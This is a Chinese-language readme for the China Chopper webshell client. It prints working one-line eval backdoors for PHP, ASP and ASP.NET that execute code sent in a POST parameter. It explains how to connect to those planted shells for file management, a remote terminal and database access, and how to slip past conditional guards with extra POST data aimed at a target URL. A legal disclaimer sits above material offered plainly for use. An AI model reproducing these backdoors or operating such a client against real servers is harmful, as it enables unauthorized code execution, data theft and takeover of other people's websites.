-----------------------------------------------------
免责申明：请使用者注意使用环境并遵守国家相关法律法规！
　　　　　由于使用不当造成的后果本厂家不承担任何责任！
-----------------------------------------------------
友情提示：程序在使用过程中难免有各种BUG，帮助/检查更新一下吧，说不定己经修补了呢。

UINCODE方式编译，支持多国语言输入显示。

一、EVAL客户端部分
　　1）要了解的
　　服务端只需要简单的一行代码，即可用此程序实现常用的管理功能。
　　目前支持的服务端脚本：PHP, ASP, ASP.NET。
　　在服务端运行的代码如下：
　　PHP:    <?php @eval($_POST['pass']);?>
　　ASP:    <%eval request("pass")%>
　　ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
　　 (注意: ASP.NET要单独一个文件或此文件也是Jscript语言)

　　2）怎么用
　　在主视图中右键/添加，在弹出的对话框中输入服务端地址，连接的密码(请注意上例中的pass字串)，选择正确的脚本类型和语言编码，保存后即可使用文件管理，虚拟终端，数据库管理三大块功能。要是其它都没错误，那么可能就是你把语言编码选错了。
　　1. 文件管理：[特色]缓存下载目录，并支持离线查看缓存目录;
　　2. 虚拟终端：[特色]人性化的设计，操作方便;(输入HELP查看更多用法)
　　3. 数据库管理：[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS
　　　　以入支持ADO方式连接的数据库。
　　　　(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
　　注意：由于服务器的安全设置，某些功能可能不能正常使用。

　　3)  关于配置信息怎么填？
　　　　A)  数据库方面：
　　　　PHP脚本：
　　　　<T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
　　　　<H>主机地址<H> 主机地址可为机器名或IP地址，如localhost
　　　　<U>数据库用户</U> 连接数据库的用户名，如root
　　　　<P>数据库密码</P> 连接数据库的密码，如123455
　　　　ASP和ASP.NET脚本：
　　　　<T>类型</T> 类型只能填ADO
　　　　<C>ADO配置信息</C>
　　　　ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
　　　　Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456

　　　　B) 其它方面：
　　　　添加额外附加提交的数据：应付这种情况：if ($_POST['action']=='test'){@eval($_POST['pass']);}
　　　　<O>action=test</O>
　　　　提交功能前先POST额外的数据包：会话期间只提交一次。
　　　　<POST>https://target.com/cgi-bin/login.cgi</POST>
　　　　<DATA>uid=user1&pwd=123456</DATA>

二、网站蜘蛛
　　织出一张网站的目录结构。
　　下载的列表文件存在桌面，右键菜单/载入URL列表即可以根据地址得到目录结构。

三、定时提醒
　　当闹钟来使吧, 周期：每月/每周/每日/只一次。

四、快速启动
　　一些常用的快捷方式放在这里，可以指定用户身份运行程序。这部分数据是以加密存储的。

五、浏览器
　　地址栏输入HELP，更多精彩后续加入。

六、其它部分
　　等待加入。



-----------------------------------------------------
附带工具
-----------------------------------------------------
update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。
把wscdb文件整到当前目录，运行update.exe得到新的数据库文件caidao.mdb
把菜刀的数据库db.mdb替换掉即可。